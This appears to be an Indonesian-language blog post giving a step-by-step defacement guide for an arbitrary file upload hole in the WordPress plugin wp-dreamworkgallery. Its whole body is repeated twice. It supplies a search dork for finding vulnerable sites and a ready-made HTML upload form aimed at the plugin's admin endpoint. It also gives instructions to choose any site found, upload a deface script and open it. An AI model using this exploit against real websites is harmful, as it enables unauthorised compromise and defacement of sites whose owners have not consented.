Deface Poc : WP ARBITRARY DREAM WORK GALLERY FILE UPLOAD
By : Mr_BTBX
(Alias No copas 😂😂😂)
Manamungkinlah gw buat poc sendiri 😂😂
Bahan Bahan yg harus disiapin :
1.Dork : inurl:/wp-content/plugins/wp-dreamworkgallery
2.Script Deface
3.script :
<form action="www.target.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
4.klo Pc : Notepad,dll, klo andro : (app yang biasa lu gunain buat script) terserah, klo gw pake "Es Pengelola Berkas"
Langkag - Langkah :
1.Biasalah gan Dorking Dulu
2.pilih web bebas (untuk vulnerablenya gw blm tau kaya gmn)
3.buka aplikasi yg biasa lu pake (notepad, es pengelola berkas, dll)
4.copas script diatas
5.ubah "www.target.com" jadi web yang mau kalian tusbol
6.simpen Scriptnya dengan ekstensi ".html" (tanpa tanda kutip)
7.buka script nya
8.nanti bakalan ada tulisan "choose file" , masukin script deface lu, lalu klik "sumbit"
9.setelah di upload maka akan otomatis menuju ke web target lu, dan akan muncul gambar kaya diatas
10.copas tulisan yang gw kasi tanda merah diatas ke sebelah target kalian
11.dan Booom!! nanti bakalan muncul Sc deface lu!!
By : Mr_BTBX
(Alias No copas 😂😂😂)
Manamungkinlah gw buat poc sendiri 😂😂
Bahan Bahan yg harus disiapin :
1.Dork : inurl:/wp-content/plugins/wp-dreamworkgallery
2.Script Deface
3.script :
<form action="www.target.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
4.klo Pc : Notepad,dll, klo andro : (app yang biasa lu gunain buat script) terserah, klo gw pake "Es Pengelola Berkas"
Langkag - Langkah :
1.Biasalah gan Dorking Dulu
2.pilih web bebas (untuk vulnerablenya gw blm tau kaya gmn)
3.buka aplikasi yg biasa lu pake (notepad, es pengelola berkas, dll)
4.copas script diatas
5.ubah "www.target.com" jadi web yang mau kalian tusbol
6.simpen Scriptnya dengan ekstensi ".html" (tanpa tanda kutip)
7.buka script nya
8.nanti bakalan ada tulisan "choose file" , masukin script deface lu, lalu klik "sumbit"
9.setelah di upload maka akan otomatis menuju ke web target lu, dan akan muncul gambar kaya diatas
10.copas tulisan yang gw kasi tanda merah diatas ke sebelah target kalian
11.dan Booom!! nanti bakalan muncul Sc deface lu!!
0 Comments